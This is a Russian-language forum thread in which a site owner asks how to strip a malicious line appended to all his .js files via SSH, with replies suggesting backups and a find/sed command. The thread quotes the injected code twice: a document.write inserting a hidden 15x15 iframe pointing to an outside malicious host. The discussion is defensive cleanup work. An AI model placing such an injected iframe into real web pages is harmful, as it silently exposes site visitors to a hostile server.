заражени все .js файли на сайте

[terran_1202]

вирус попал на сайт(пароли поменял), добавил в конец последней строки всех файлов .js вредоносний код

;document.write('<iframe src="http://turbotwisttristate.get-well-now.info/ewtyrtu.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

подскажите как перебрать все файли через ssh и удилить добавлений код

пока только
1 сделал архив всей папки сайта и скачал
2 вылечил NOTEPAD++
3 залил назад, сменил права на файли, и пароль на доступ
все сайт впорядке. (осталось 39 раз проделать тоже самое)
проблема актуальна , хотелось бывсе же использовать bash

 

[niza]

посмотрите дату изменения файлов на сервере где вирус
и восстановите из бэкапа.

 

[donvictorio]

find -type f -name \*.py -exec sed -i -r 's/regexp1/regexp2/g' {} \;
Заменит во всех файлах *.py начиная от текущей директории строку regexp1 на regexp2. (можно использовать regexp выражения)

 

[terran_1202]

подскажите как сделять регулярное выражение для

;document.write('<iframe src="http://turbotwisttristate.get-well-now.info/ewtyrtu.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

 

[efs]

курим Для просмотра ссылки Войди или Зарегистрируйся